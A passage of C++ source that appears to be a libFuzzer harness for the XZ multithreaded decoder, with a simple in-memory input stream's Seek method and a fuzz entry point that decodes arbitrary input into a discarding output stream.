        _pos += toRead;
        if (processedSize)
            *processedSize = toRead;
        return S_OK;
    }
    STDMETHOD(Seek)(Int64 offset, UInt32 seekOrigin, UInt64 *newPosition) {
        if (seekOrigin == STREAM_SEEK_SET)
            _pos = (UInt32)offset;
        else if (seekOrigin == STREAM_SEEK_CUR)
            _pos += (UInt32)offset;
        else if (seekOrigin == STREAM_SEEK_END)
            _pos = (UInt32)(_size + offset);
        if (newPosition)
            *newPosition = _pos;
        return S_OK;
    }
};
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    CXzDecMtHandle p = XzDecMt_Create(&alloc, &g_AlignedAlloc);
    CXzDecMtProps props;
    XzDecMtProps_Init(&props);
    BufInStream inStream;
    inStream.SetData(Data, Size);
    FakeOutStream outStream;
    CSeqInStreamWrap inWrap;
    CSeqOutStreamWrap outWrap;
    CCompressProgressWrap progressWrap;
    inWrap.Init(&inStream);
    outWrap.Init(&outStream);
    SRes res = XzDecMt_Decode(p, &props, NULL, CODER_FINISH_ANY, &outWrap.vt,
                              &inWrap.vt, &stat, &isMT, NULL);
    XzDecMt_Destroy(p);
    return 0;
}